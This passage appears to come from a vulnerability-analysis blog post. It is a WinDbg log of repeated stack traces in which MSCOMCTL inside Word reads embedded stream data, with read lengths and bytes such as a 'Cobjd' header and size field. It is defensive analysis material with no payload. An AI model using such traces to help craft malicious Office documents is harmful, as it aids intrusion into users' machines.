0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

00313334 64adf54e wwlib!DllGetClassObject+0x5b213

00313378 65878487 wwlib!DllGetClassObject+0x5a904

27632368 00 00 ..

ReadLength = 0x2

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a8ec 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41a42

0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b

0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

0030a910 0c 00 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a8ec 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41a74

0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b

0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

0d511db0 43 6f 62 6a 64 00 00 00-82 82 00 00 Cobjd.......

ReadLength = 0xc

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a8ec 275c87ed ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a914 275c89df MSCOMCTL!DllGetClassObject+0x41aa9

0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41c9b

0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

ReadLength = 0x0

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a8ec 275c8786 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a914 275c8a0a MSCOMCTL!DllGetClassObject+0x41a42

0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41cc6

0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

0030a910 82 82 00 00 ....

ReadLength = 0x4

--------------------------------------------------------------------------------------------------------------

ChildEBP RetAddr

0030a8ec 275c87b8 ole32!CExposedStream::Read [d:\w7rtm\com\ole32\stg\exp\expst.cxx @ 165]

WARNING: Stack unwind information not available. Following frames may be wrong.

0030a914 275c8a0a MSCOMCTL!DllGetClassObject+0x41a74

0030a948 275e701a MSCOMCTL!DllGetClassObject+0x41cc6

0030a970 275e7361 MSCOMCTL!DLLGetDocumentation+0xd08

0030a990 275ca8b6 MSCOMCTL!DLLGetDocumentation+0x104f

0030aa10 2758aee8 MSCOMCTL!DllGetClassObject+0x43b72

0030aa40 27600908 MSCOMCTL!DllGetClassObject+0x41a4

0030aa54 65642904 MSCOMCTL!DllUnregisterServer+0xc31

0030ab08 64fb2877 wwlib!DllCanUnloadNow+0x3145c2

0030abbc 64f7a003 wwlib!wdCommandDispatch+0x151602

0030ac44 64f238da wwlib!wdCommandDispatch+0x118d8e

0030b0d4 653e91cc wwlib!wdCommandDispatch+0xc2665

0030b168 65668232 wwlib!DllCanUnloadNow+0xbae8a

0030dc20 6587c40b wwlib!DllCanUnloadNow+0x339ef0

0030ff60 6588699d wwlib!DllCanUnloadNow+0x54e0c9

00310274 6566a206 wwlib!DllCanUnloadNow+0x55865b

003104c4 653eb9c6 wwlib!DllCanUnloadNow+0x33bec4

00310708 6534f93a wwlib!DllCanUnloadNow+0xbd684

00311dd4 64ab25f6 wwlib!DllCanUnloadNow+0x215f8

00312278 64adfe5d wwlib!DllGetClassObject+0x2d9ac

0d494cd0 00 00 00 00 00 00 00 00-00 00 00 00 30 3c 58 27 ............0

文章评论